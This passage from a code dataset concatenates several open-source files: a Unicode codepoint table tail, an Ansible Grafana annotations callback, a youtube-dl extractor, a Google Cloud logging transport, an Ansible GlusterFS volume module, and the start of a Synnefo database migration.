0x108f4000108f6,
0x1090000010916,
0x109200001093a,
0x10980000109b8,
0x109be000109c0,
0x10a0000010a04,
0x10a0500010a07,
0x10a0c00010a14,
0x10a1500010a18,
0x10a1900010a36,
0x10a3800010a3b,
0x10a3f00010a40,
0x10a6000010a7d,
0x10a8000010a9d,
0x10ac000010ac8,
0x10ac900010ae7,
0x10b0000010b36,
0x10b4000010b56,
0x10b6000010b73,
0x10b8000010b92,
0x10c0000010c49,
0x10cc000010cf3,
0x10d0000010d28,
0x10d3000010d3a,
0x10f0000010f1d,
0x10f2700010f28,
0x10f3000010f51,
0x1100000011047,
0x1106600011070,
0x1107f000110bb,
0x110d0000110e9,
0x110f0000110fa,
0x1110000011135,
0x1113600011140,
0x1114400011147,
0x1115000011174,
0x1117600011177,
0x11180000111c5,
0x111c9000111cd,
0x111d0000111db,
0x111dc000111dd,
0x1120000011212,
0x1121300011238,
0x1123e0001123f,
0x1128000011287,
0x1128800011289,
0x1128a0001128e,
0x1128f0001129e,
0x1129f000112a9,
0x112b0000112eb,
0x112f0000112fa,
0x1130000011304,
0x113050001130d,
0x1130f00011311,
0x1131300011329,
0x1132a00011331,
0x1133200011334,
0x113350001133a,
0x1133b00011345,
0x1134700011349,
0x1134b0001134e,
0x1135000011351,
0x1135700011358,
0x1135d00011364,
0x113660001136d,
0x1137000011375,
0x114000001144b,
0x114500001145a,
0x1145e0001145f,
0x11480000114c6,
0x114c7000114c8,
0x114d0000114da,
0x11580000115b6,
0x115b8000115c1,
0x115d8000115de,
0x1160000011641,
0x1164400011645,
0x116500001165a,
0x11680000116b8,
0x116c0000116ca,
0x117000001171b,
0x1171d0001172c,
0x117300001173a,
0x118000001183b,
0x118c0000118ea,
0x118ff00011900,
0x11a0000011a3f,
0x11a4700011a48,
0x11a5000011a84,
0x11a8600011a9a,
0x11a9d00011a9e,
0x11ac000011af9,
0x11c0000011c09,
0x11c0a00011c37,
0x11c3800011c41,
0x11c5000011c5a,
0x11c7200011c90,
0x11c9200011ca8,
0x11ca900011cb7,
0x11d0000011d07,
0x11d0800011d0a,
0x11d0b00011d37,
0x11d3a00011d3b,
0x11d3c00011d3e,
0x11d3f00011d48,
0x11d5000011d5a,
0x11d6000011d66,
0x11d6700011d69,
0x11d6a00011d8f,
0x11d9000011d92,
0x11d9300011d99,
0x11da000011daa,
0x11ee000011ef7,
0x120000001239a,
0x1248000012544,
0x130000001342f,
0x1440000014647,
0x1680000016a39,
0x16a4000016a5f,
0x16a6000016a6a,
0x16ad000016aee,
0x16af000016af5,
0x16b0000016b37,
0x16b4000016b44,
0x16b5000016b5a,
0x16b6300016b78,
0x16b7d00016b90,
0x16e6000016e80,
0x16f0000016f45,
0x16f5000016f7f,
0x16f8f00016fa0,
0x16fe000016fe2,
0x17000000187f2,
0x1880000018af3,
0x1b0000001b11f,
0x1b1700001b2fc,
0x1bc000001bc6b,
0x1bc700001bc7d,
0x1bc800001bc89,
0x1bc900001bc9a,
0x1bc9d0001bc9f,
0x1da000001da37,
0x1da3b0001da6d,
0x1da750001da76,
0x1da840001da85,
0x1da9b0001daa0,
0x1daa10001dab0,
0x1e0000001e007,
0x1e0080001e019,
0x1e01b0001e022,
0x1e0230001e025,
0x1e0260001e02b,
0x1e8000001e8c5,
0x1e8d00001e8d7,
0x1e9220001e94b,
0x1e9500001e95a,
0x200000002a6d7,
0x2a7000002b735,
0x2b7400002b81e,
0x2b8200002cea2,
0x2ceb00002ebe1,
),
'CONTEXTJ': (
0x200c0000200e,
),
'CONTEXTO': (
0xb7000000b8,
0x37500000376,
0x5f3000005f5,
0x6600000066a,
0x6f0000006fa,
0x30fb000030fc,
),
}
| apache-2.0 |
slohse/ansible | lib/ansible/plugins/callback/grafana_annotations.py | 22 | 9217 | # -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import socket
import getpass
from base64 import b64encode
from datetime import datetime
from ansible.module_utils.urls import open_url
from ansible.plugins.callback import CallbackBase
DOCUMENTATION = """
callback: grafana_annotations
callback_type: notification
short_description: send ansible events as annotations on charts to grafana over http api.
author: "Rémi REY (@rrey)"
description:
- This callback will report start, failed and stats events to Grafana as annotations (https://grafana.com)
version_added: "2.6"
requirements:
- whitelisting in configuration
options:
grafana_url:
description: Grafana annotations api URL
required: True
env:
- name: GRAFANA_URL
ini:
- section: callback_grafana_annotations
key: grafana_url
validate_grafana_certs:
description: validate the SSL certificate of the Grafana server. (For HTTPS url)
env:
- name: GRAFANA_VALIDATE_CERT
ini:
- section: callback_grafana_annotations
key: validate_grafana_certs
default: True
type: bool
http_agent:
      description: The HTTP 'User-agent' value to set in HTTP requests.
env:
- name: HTTP_AGENT
ini:
- section: callback_grafana_annotations
key: http_agent
default: 'Ansible (grafana_annotations callback)'
grafana_api_key:
      description: Grafana API key, used to authenticate when posting to the HTTP API.
                   If not provided, grafana_user and grafana_password will
                   be required.
env:
- name: GRAFANA_API_KEY
ini:
- section: callback_grafana_annotations
key: grafana_api_key
grafana_user:
description: Grafana user used for authentication. Ignored if grafana_api_key is provided.
env:
- name: GRAFANA_USER
ini:
- section: callback_grafana_annotations
key: grafana_user
default: ansible
grafana_password:
description: Grafana password used for authentication. Ignored if grafana_api_key is provided.
env:
- name: GRAFANA_PASSWORD
ini:
- section: callback_grafana_annotations
key: grafana_password
default: ansible
grafana_dashboard_id:
description: The grafana dashboard id where the annotation shall be created.
env:
- name: GRAFANA_DASHBOARD_ID
ini:
- section: callback_grafana_annotations
key: grafana_dashboard_id
grafana_panel_id:
description: The grafana panel id where the annotation shall be created.
env:
- name: GRAFANA_PANEL_ID
ini:
- section: callback_grafana_annotations
key: grafana_panel_id
"""
PLAYBOOK_START_TXT = """\
Started playbook {playbook}
From '{hostname}'
By user '{username}'
"""
PLAYBOOK_ERROR_TXT = """\
Playbook {playbook} Failure !
From '{hostname}'
By user '{username}'
'{task}' failed on {host}
debug: {result}
"""
PLAYBOOK_STATS_TXT = """\
Playbook {playbook}
Duration: {duration}
Status: {status}
From '{hostname}'
By user '{username}'
Result:
{summary}
"""
def to_millis(dt):
return int(dt.strftime('%s')) * 1000
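# Note: dt.strftime('%s') above relies on a platform-specific extension and is
# not available everywhere (e.g. on Windows). A minimal portable sketch for
# naive local-time datetimes is shown below; it is illustrative only and is
# not used by this callback.
def _to_millis_portable(dt):
    """Convert a naive local-time datetime to epoch milliseconds."""
    import time as _time
    return int(_time.mktime(dt.timetuple())) * 1000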
class CallbackModule(CallbackBase):
"""
ansible grafana callback plugin
ansible.cfg:
callback_plugins = <path_to_callback_plugins_folder>
callback_whitelist = grafana_annotations
and put the plugin in <path_to_callback_plugins_folder>
"""
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'aggregate'
CALLBACK_NAME = 'grafana_annotations'
CALLBACK_NEEDS_WHITELIST = True
def __init__(self, display=None):
super(CallbackModule, self).__init__(display=display)
self.headers = {'Content-Type': 'application/json'}
self.force_basic_auth = False
self.hostname = socket.gethostname()
self.username = getpass.getuser()
self.start_time = datetime.now()
self.errors = 0
def set_options(self, task_keys=None, var_options=None, direct=None):
super(CallbackModule, self).set_options(task_keys=task_keys, var_options=var_options, direct=direct)
self.grafana_api_key = self.get_option('grafana_api_key')
self.grafana_url = self.get_option('grafana_url')
self.validate_grafana_certs = self.get_option('validate_grafana_certs')
self.http_agent = self.get_option('http_agent')
self.grafana_user = self.get_option('grafana_user')
self.grafana_password = self.get_option('grafana_password')
self.dashboard_id = self.get_option('grafana_dashboard_id')
self.panel_id = self.get_option('grafana_panel_id')
if self.grafana_api_key:
self.headers['Authorization'] = "Bearer %s" % self.grafana_api_key
else:
self.force_basic_auth = True
if self.grafana_url is None:
self.disabled = True
self._display.warning('Grafana URL was not provided. The '
'Grafana URL can be provided using '
'the `GRAFANA_URL` environment variable.')
        self._display.debug('Grafana URL: %s' % self.grafana_url)
def v2_playbook_on_start(self, playbook):
self.playbook = playbook._file_name
text = PLAYBOOK_START_TXT.format(playbook=self.playbook, hostname=self.hostname,
username=self.username)
data = {
'time': to_millis(self.start_time),
'text': text,
'tags': ['ansible', 'ansible_event_start', self.playbook]
}
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def v2_playbook_on_stats(self, stats):
end_time = datetime.now()
duration = end_time - self.start_time
summarize_stat = {}
for host in stats.processed.keys():
summarize_stat[host] = stats.summarize(host)
status = "FAILED"
if self.errors == 0:
status = "OK"
text = PLAYBOOK_STATS_TXT.format(playbook=self.playbook, hostname=self.hostname,
duration=duration.total_seconds(),
status=status, username=self.username,
summary=json.dumps(summarize_stat))
data = {
'time': to_millis(self.start_time),
'timeEnd': to_millis(end_time),
'isRegion': True,
'text': text,
'tags': ['ansible', 'ansible_report', self.playbook]
}
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def v2_runner_on_failed(self, result, **kwargs):
text = PLAYBOOK_ERROR_TXT.format(playbook=self.playbook, hostname=self.hostname,
username=self.username, task=result._task,
host=result._host.name, result=self._dump_results(result._result))
data = {
'time': to_millis(datetime.now()),
'text': text,
'tags': ['ansible', 'ansible_event_failure', self.playbook]
}
self.errors += 1
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def _send_annotation(self, annotation):
try:
response = open_url(self.grafana_url, data=annotation, headers=self.headers,
method="POST",
validate_certs=self.validate_grafana_certs,
url_username=self.grafana_user, url_password=self.grafana_password,
http_agent=self.http_agent, force_basic_auth=self.force_basic_auth)
except Exception as e:
self._display.error('Could not submit message to Grafana: %s' % str(e))
| gpl-3.0 |
aboutsajjad/Bridge | app_packages/youtube_dl/extractor/worldstarhiphop.py | 57 | 1344 | from __future__ import unicode_literals
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?.*?\bv=(?P<id>[^&]+)'
_TESTS = [{
'url': 'http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': '9d04de741161603bf7071bbf4e883186',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
'title': 'KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!'
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
entries = self._parse_html5_media_entries(url, webpage, video_id)
if not entries:
return self.url_result(url, 'Generic')
title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
info = entries[0]
info.update({
'id': video_id,
'title': title,
})
return info
| mit |
jonparrott/google-cloud-python | logging/google/cloud/logging/handlers/transports/sync.py | 3 | 2028 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transport for Python logging handler.
Logs directly to the Stackdriver Logging API with a synchronous call.
"""
from google.cloud.logging.handlers.transports.base import Transport
class SyncTransport(Transport):
"""Basic sychronous transport.
Uses this library's Logging client to directly make the API call.
"""
def __init__(self, client, name):
self.logger = client.logger(name)
def send(self, record, message, resource=None, labels=None,
trace=None, span_id=None):
"""Overrides transport.send().
:type record: :class:`logging.LogRecord`
:param record: Python log record that the handler was called with.
:type message: str
:param message: The message from the ``LogRecord`` after being
formatted by the associated log formatters.
:type resource: :class:`~google.cloud.logging.resource.Resource`
:param resource: (Optional) Monitored resource of the entry.
:type labels: dict
:param labels: (Optional) Mapping of labels for the entry.
"""
info = {'message': message, 'python_logger': record.name}
self.logger.log_struct(info,
severity=record.levelname,
resource=resource,
labels=labels,
trace=trace,
span_id=span_id)
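# A minimal usage sketch (not part of this module): attaching this transport
# to the standard logging module through CloudLoggingHandler. The handler name
# 'example_log' is an arbitrary placeholder, and this assumes
# CloudLoggingHandler accepts a ``transport`` argument as in this package's
# handlers module.
#
#     import logging
#     import google.cloud.logging
#     from google.cloud.logging.handlers import CloudLoggingHandler
#
#     client = google.cloud.logging.Client()
#     handler = CloudLoggingHandler(client, name='example_log',
#                                   transport=SyncTransport)
#     logging.getLogger().addHandler(handler)
#     logging.getLogger().warning('logged with a synchronous API call')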
| apache-2.0 |
JimCircadian/ansible | lib/ansible/modules/storage/glusterfs/gluster_volume.py | 20 | 15711 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Taneli Leppä <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: gluster_volume
short_description: Manage GlusterFS volumes
description:
- Create, remove, start, stop and tune GlusterFS volumes
version_added: '1.9'
options:
name:
description:
- The volume name.
required: true
aliases: ['volume']
state:
description:
    - Use present/absent to ensure whether a volume exists or not.
Use started/stopped to control its availability.
required: true
choices: ['absent', 'present', 'started', 'stopped']
cluster:
description:
- List of hosts to use for probing and brick setup.
host:
description:
- Override local hostname (for peer probing purposes).
replicas:
description:
- Replica count for volume.
arbiters:
description:
- Arbiter count for volume.
version_added: '2.3'
stripes:
description:
- Stripe count for volume.
disperses:
description:
- Disperse count for volume.
version_added: '2.2'
redundancies:
description:
- Redundancy count for volume.
version_added: '2.2'
transport:
description:
- Transport type for volume.
default: tcp
choices: [ tcp, rdma, 'tcp,rdma' ]
bricks:
description:
- Brick paths on servers. Multiple brick paths can be separated by commas.
aliases: [ brick ]
start_on_create:
description:
- Controls whether the volume is started after creation or not.
type: bool
default: 'yes'
rebalance:
description:
- Controls whether the cluster is rebalanced after changes.
type: bool
default: 'no'
directory:
description:
- Directory for limit-usage.
options:
description:
- A dictionary/hash with options/settings for the volume.
quota:
description:
- Quota value for limit-usage (be sure to use 10.0MB instead of 10MB, see quota list).
force:
description:
- If brick is being created in the root partition, module will fail.
Set force to true to override this behaviour.
type: bool
notes:
- Requires cli tools for GlusterFS on servers.
- Will add new bricks, but not remove them.
author:
- Taneli Leppä (@rosmo)
"""
EXAMPLES = """
- name: create gluster volume
gluster_volume:
state: present
name: test1
bricks: /bricks/brick1/g1
rebalance: yes
cluster:
- 192.0.2.10
- 192.0.2.11
run_once: true
- name: tune
gluster_volume:
state: present
name: test1
options:
performance.cache-size: 256MB
- name: Set multiple options on GlusterFS volume
gluster_volume:
state: present
name: test1
options:
{ performance.cache-size: 128MB,
write-behind: 'off',
quick-read: 'on'
}
- name: start gluster volume
gluster_volume:
state: started
name: test1
- name: limit usage
gluster_volume:
state: present
name: test1
directory: /foo
quota: 20.0MB
- name: stop gluster volume
gluster_volume:
state: stopped
name: test1
- name: remove gluster volume
gluster_volume:
state: absent
name: test1
- name: create gluster volume with multiple bricks
gluster_volume:
state: present
name: test2
bricks: /bricks/brick1/g2,/bricks/brick2/g2
cluster:
- 192.0.2.10
- 192.0.2.11
run_once: true
"""
import re
import socket
import time
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
glusterbin = ''
def run_gluster(gargs, **kwargs):
global glusterbin
global module
args = [glusterbin, '--mode=script']
args.extend(gargs)
try:
rc, out, err = module.run_command(args, **kwargs)
if rc != 0:
module.fail_json(msg='error running gluster (%s) command (rc=%d): %s' %
(' '.join(args), rc, out or err), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg='error running gluster (%s) command: %s' % (' '.join(args),
to_native(e)), exception=traceback.format_exc())
return out
def run_gluster_nofail(gargs, **kwargs):
global glusterbin
global module
args = [glusterbin]
args.extend(gargs)
rc, out, err = module.run_command(args, **kwargs)
if rc != 0:
return None
return out
def get_peers():
out = run_gluster(['peer', 'status'])
peers = {}
hostname = None
uuid = None
state = None
shortNames = False
for row in out.split('\n'):
if ': ' in row:
key, value = row.split(': ')
if key.lower() == 'hostname':
hostname = value
shortNames = False
if key.lower() == 'uuid':
uuid = value
if key.lower() == 'state':
state = value
peers[hostname] = [uuid, state]
elif row.lower() == 'other names:':
shortNames = True
elif row != '' and shortNames is True:
peers[row] = [uuid, state]
elif row == '':
shortNames = False
return peers
def get_volumes():
out = run_gluster(['volume', 'info'])
volumes = {}
volume = {}
for row in out.split('\n'):
if ': ' in row:
key, value = row.split(': ')
if key.lower() == 'volume name':
volume['name'] = value
volume['options'] = {}
volume['quota'] = False
if key.lower() == 'volume id':
volume['id'] = value
if key.lower() == 'status':
volume['status'] = value
if key.lower() == 'transport-type':
volume['transport'] = value
if value.lower().endswith(' (arbiter)'):
if 'arbiters' not in volume:
volume['arbiters'] = []
value = value[:-10]
volume['arbiters'].append(value)
if key.lower() != 'bricks' and key.lower()[:5] == 'brick':
if 'bricks' not in volume:
volume['bricks'] = []
volume['bricks'].append(value)
# Volume options
if '.' in key:
if 'options' not in volume:
volume['options'] = {}
volume['options'][key] = value
if key == 'features.quota' and value == 'on':
volume['quota'] = True
else:
if row.lower() != 'bricks:' and row.lower() != 'options reconfigured:':
if len(volume) > 0:
volumes[volume['name']] = volume
volume = {}
return volumes
def get_quotas(name, nofail):
quotas = {}
if nofail:
out = run_gluster_nofail(['volume', 'quota', name, 'list'])
if not out:
return quotas
else:
out = run_gluster(['volume', 'quota', name, 'list'])
for row in out.split('\n'):
if row[:1] == '/':
q = re.split(r'\s+', row)
quotas[q[0]] = q[1]
return quotas
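# Example of the shape returned by get_quotas(): for a `gluster volume quota
# <name> list` row such as "/foo  20.0MB  80%  ..." the dict would contain
# {'/foo': '20.0MB'}, i.e. only the path and the second (hard-limit) column
# are kept. The exact columns depend on the gluster version.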
def wait_for_peer(host):
for x in range(0, 4):
peers = get_peers()
if host in peers and peers[host][1].lower().find('peer in cluster') != -1:
return True
time.sleep(1)
return False
def probe(host, myhostname):
global module
out = run_gluster(['peer', 'probe', host])
if out.find('localhost') == -1 and not wait_for_peer(host):
module.fail_json(msg='failed to probe peer %s on %s' % (host, myhostname))
def probe_all_peers(hosts, peers, myhostname):
for host in hosts:
host = host.strip() # Clean up any extra space for exact comparison
if host not in peers:
probe(host, myhostname)
def create_volume(name, stripe, replica, arbiter, disperse, redundancy, transport, hosts, bricks, force):
args = ['volume', 'create']
args.append(name)
if stripe:
args.append('stripe')
args.append(str(stripe))
if replica:
args.append('replica')
args.append(str(replica))
if arbiter:
args.append('arbiter')
args.append(str(arbiter))
if disperse:
args.append('disperse')
args.append(str(disperse))
if redundancy:
args.append('redundancy')
args.append(str(redundancy))
args.append('transport')
args.append(transport)
for brick in bricks:
for host in hosts:
args.append(('%s:%s' % (host, brick)))
if force:
args.append('force')
run_gluster(args)
def start_volume(name):
run_gluster(['volume', 'start', name])
def stop_volume(name):
run_gluster(['volume', 'stop', name])
def set_volume_option(name, option, parameter):
run_gluster(['volume', 'set', name, option, parameter])
def add_bricks(name, new_bricks, stripe, replica, force):
args = ['volume', 'add-brick', name]
if stripe:
args.append('stripe')
args.append(str(stripe))
if replica:
args.append('replica')
args.append(str(replica))
args.extend(new_bricks)
if force:
args.append('force')
run_gluster(args)
def do_rebalance(name):
run_gluster(['volume', 'rebalance', name, 'start'])
def enable_quota(name):
run_gluster(['volume', 'quota', name, 'enable'])
def set_quota(name, directory, value):
run_gluster(['volume', 'quota', name, 'limit-usage', directory, value])
def main():
# MAIN
global module
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True, aliases=['volume']),
state=dict(type='str', required=True, choices=['absent', 'started', 'stopped', 'present']),
cluster=dict(type='list'),
host=dict(type='str'),
stripes=dict(type='int'),
replicas=dict(type='int'),
arbiters=dict(type='int'),
disperses=dict(type='int'),
redundancies=dict(type='int'),
transport=dict(type='str', default='tcp', choices=['tcp', 'rdma', 'tcp,rdma']),
bricks=dict(type='str', aliases=['brick']),
start_on_create=dict(type='bool', default=True),
rebalance=dict(type='bool', default=False),
options=dict(type='dict', default={}),
quota=dict(type='str'),
directory=dict(type='str'),
force=dict(type='bool', default=False),
),
)
global glusterbin
glusterbin = module.get_bin_path('gluster', True)
changed = False
action = module.params['state']
volume_name = module.params['name']
cluster = module.params['cluster']
brick_paths = module.params['bricks']
stripes = module.params['stripes']
replicas = module.params['replicas']
arbiters = module.params['arbiters']
disperses = module.params['disperses']
redundancies = module.params['redundancies']
transport = module.params['transport']
myhostname = module.params['host']
start_on_create = module.boolean(module.params['start_on_create'])
rebalance = module.boolean(module.params['rebalance'])
force = module.boolean(module.params['force'])
if not myhostname:
myhostname = socket.gethostname()
# Clean up if last element is empty. Consider that yml can look like this:
# cluster="{% for host in groups['glusterfs'] %}{{ hostvars[host]['private_ip'] }},{% endfor %}"
if cluster is not None and len(cluster) > 1 and cluster[-1] == '':
cluster = cluster[0:-1]
if cluster is None:
cluster = []
if brick_paths is not None and "," in brick_paths:
brick_paths = brick_paths.split(",")
else:
brick_paths = [brick_paths]
options = module.params['options']
quota = module.params['quota']
directory = module.params['directory']
# get current state info
peers = get_peers()
volumes = get_volumes()
quotas = {}
if volume_name in volumes and volumes[volume_name]['quota'] and volumes[volume_name]['status'].lower() == 'started':
quotas = get_quotas(volume_name, True)
# do the work!
if action == 'absent':
if volume_name in volumes:
if volumes[volume_name]['status'].lower() != 'stopped':
stop_volume(volume_name)
run_gluster(['volume', 'delete', volume_name])
changed = True
if action == 'present':
probe_all_peers(cluster, peers, myhostname)
# create if it doesn't exist
if volume_name not in volumes:
create_volume(volume_name, stripes, replicas, arbiters, disperses, redundancies, transport, cluster, brick_paths, force)
volumes = get_volumes()
changed = True
if volume_name in volumes:
if volumes[volume_name]['status'].lower() != 'started' and start_on_create:
start_volume(volume_name)
changed = True
# switch bricks
new_bricks = []
removed_bricks = []
all_bricks = []
for node in cluster:
for brick_path in brick_paths:
brick = '%s:%s' % (node, brick_path)
all_bricks.append(brick)
if brick not in volumes[volume_name]['bricks']:
new_bricks.append(brick)
            # this module does not yet remove bricks, but we check those anyway
for brick in volumes[volume_name]['bricks']:
if brick not in all_bricks:
removed_bricks.append(brick)
if new_bricks:
add_bricks(volume_name, new_bricks, stripes, replicas, force)
changed = True
# handle quotas
if quota:
if not volumes[volume_name]['quota']:
enable_quota(volume_name)
quotas = get_quotas(volume_name, False)
if directory not in quotas or quotas[directory] != quota:
set_quota(volume_name, directory, quota)
changed = True
# set options
for option in options.keys():
if option not in volumes[volume_name]['options'] or volumes[volume_name]['options'][option] != options[option]:
set_volume_option(volume_name, option, options[option])
changed = True
else:
module.fail_json(msg='failed to create volume %s' % volume_name)
    if action != 'absent' and volume_name not in volumes:
module.fail_json(msg='volume not found %s' % volume_name)
if action == 'started':
if volumes[volume_name]['status'].lower() != 'started':
start_volume(volume_name)
changed = True
if action == 'stopped':
if volumes[volume_name]['status'].lower() != 'stopped':
stop_volume(volume_name)
changed = True
if changed:
volumes = get_volumes()
if rebalance:
do_rebalance(volume_name)
facts = {}
facts['glusterfs'] = {'peers': peers, 'volumes': volumes, 'quotas': quotas}
module.exit_json(changed=changed, ansible_facts=facts)
if __name__ == '__main__':
main()
| gpl-3.0 |
grnet/synnefo | snf-cyclades-app/synnefo/db/migrations/old/0086_auto__add_ipaddresslog.py | 10 | 19362 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'IPAddressLog'
db.create_table('db_ipaddresslog', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('address', self.gf('django.db.models.fields.CharField')(max_length=64, db_index=True)),
('server_id', self.gf('django.db.models.fields.IntegerField')()),
('network_id', self.gf('django.db.models.fields.IntegerField')()),
('allocated_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('released_at', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('active', self.gf('django.db.models.fields.BooleanField')(default=True)),
))
db.send_create_signal('db', ['IPAddressLog'])
def backwards(self, orm):
# Deleting model 'IPAddressLog'
db.delete_table('db_ipaddresslog')
models = {
'db.backend': {
'Meta': {'ordering': "['clustername']", 'object_name': 'Backend'},
'clustername': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'ctotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'dfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'disk_templates': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'hypervisor': ('django.db.models.fields.CharField', [], {'default': "'kvm'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'unique': 'True'}),
'mfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'password_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'pinst_cnt': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5080'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'db.backendnetwork': {
'Meta': {'unique_together': "(('network', 'backend'),)", 'object_name': 'BackendNetwork'},
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'networks'", 'on_delete': 'models.PROTECT', 'to': "orm['db.Backend']"}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'backend_networks'", 'to': "orm['db.Network']"}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '30'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.bridgepooltable': {
'Meta': {'object_name': 'BridgePoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
'db.flavor': {
'Meta': {'unique_together': "(('cpu', 'ram', 'disk', 'disk_template'),)", 'object_name': 'Flavor'},
'cpu': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disk': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'disk_template': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ram': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'db.ipaddress': {
'Meta': {'unique_together': "(('network', 'address'),)", 'object_name': 'IPAddress'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'floating_ip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'to': "orm['db.Network']"}),
